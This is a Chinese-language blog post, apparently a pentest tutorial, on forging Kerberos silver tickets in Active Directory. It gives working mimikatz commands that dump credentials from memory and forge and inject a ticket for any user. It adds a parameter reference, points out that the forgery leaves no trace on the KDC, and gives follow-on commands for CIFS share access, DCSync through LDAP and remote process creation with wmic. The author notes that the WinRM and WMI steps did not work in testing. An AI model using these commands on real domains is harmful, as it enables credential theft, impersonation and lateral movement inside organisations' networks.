一、利用基础
在知道目标机器的NTLM hash和域SID的基础上,可以伪造任意用户访问目标机器上的服务。其过程不会与KDC通信,因此不会再KDC上留下任何痕迹,只会在目标机器和本机留下日志。可以利用的服务如下:
服务注释 | 服务名称 |
WMI | HOST&RPCSS |
Powershell Remoteing | HOST&HTTP |
WinRM | HOST&HTTP |
Scheduled Tasks | HOST |
LDAP、DCSync | LDAP |
Windows File Share(CIFS) | CIFS |
Windows Remote Server Administration Tools | RPCSS&LDAP&CIFS |
二、白银票据伪造
1. 需要事先导出目标机器的服务Hash,利用的工具很多,这里用mimikatz演示
mimikatz.exe "privilege::debug” "sekurlsa::logonpasswords" "exit"
2. 利用mimikatz进行白银票据伪造并直接注入到内存
mimikatz "kerberos::golden /user:any-user /domain:domain.com /sid:S-1-5-21-2056922362-3943291772-3165935835 /target:dc-01.domain.com /rc4:cd76662d4420b930cce605b6edab46a1 /service:cifs /ptt" "exit"
参数说明:
/domain:域的完整名称,如:lab.adsecurity.org /sid:域SID,如:S-1-5-21-1473643419-774954089-2222329127 /user:域用户名,白银票据可以是任意用户,可以不存在 /service:指定服务类型,如:host、cifs、http、rpcss、ldap等 /groups(可选):用户所属的组RID,指定用户权限 /ticket(可选):指定一个路径保存票据 /ptt(可选):将申请的票据直接注入内存 /id(可选):用户RID,Mimikatz默认值是500(默认管理员帐户RID) /endin(可选):票据有效时间,Mimikatz默认值是10年,Active Directory默认Kerberos策略设置为10小时 /renewmax(可选):续订最长票据有效时间,Mimikatz默认值是10年,Active Directory默认Kerberos策略设置为最长为7天 /startoffset(可选):票证可用时的起始偏移(如果使用此选项,通常设置为-10或0)Mimikatz默认值是0
其中的需要注意的是/sid 指定的是域SID,一般查看到的SID结构=域SID+所属组RID,常见的用户SID如下:
默认管理员SID:SID:S-1-5-21 <DOMAINID> -500 域用户SID:S-1-5-21 <DOMAINID> -513 域管理员SID:S-1-5-21 <DOMAINID> -512 架构管理员SID:S-1-5-21 <DOMAINID> -518 企业管理员SID:S-1-5-21 <DOMAINID> -519 组策略创建者所有者SID:S-1-5-21 <DOMAINID> -520
(1)在注入目标的Windows File Share(cifs)访问票据后,可以访问目标计算机上的任何共享,包括c $共享,能够将文件拷贝到目标系统上
mimikatz "kerberos::golden /user:ptttest /domain:thug.com /sid:S-1-5-21-2056922362-3943291772-3165935835 /target:dc-01.thug.com /rc4:cd76662d4420b930cce605b6edab46a1 /service:cifs /ptt" exit
(2)注入目标Scheduled Tasks服务(host)访问票据后,可以在目标机器上创建计划任务
(3)在注入http和wsman服务后,可以获得目标系统上的WinRM和Powershell远程管理的权限,但是在实际测试中并没有利用成功,尚未解决
New-PSSession -Name PSC -ComputerName dc-01;Enter-PSSession -Name PSC
(4)在注入ldap服务票据后,可以获得目标系统上LDAP服务的管理权限,进而可以利用dcsync远程导出域控上的hash
(5)注入host和rpcss服务的白银票据后,可以利用wmi在目标系统上执行命令。在测试中也没有成功,尚未解决。
wmic /AUTHORITY:"kerberos:thug.com\dc-01" /NODE:"dc-01" process call create "cmd /c echo 111 > C:\Users\Administrator\Desktop\111.txt"
三、结束语
哪位师傅测试成功了,烦请指点一二,不胜感激!
参考链接:
[1] backlion 师傅 Blog
No Leanote account ? Sign up now.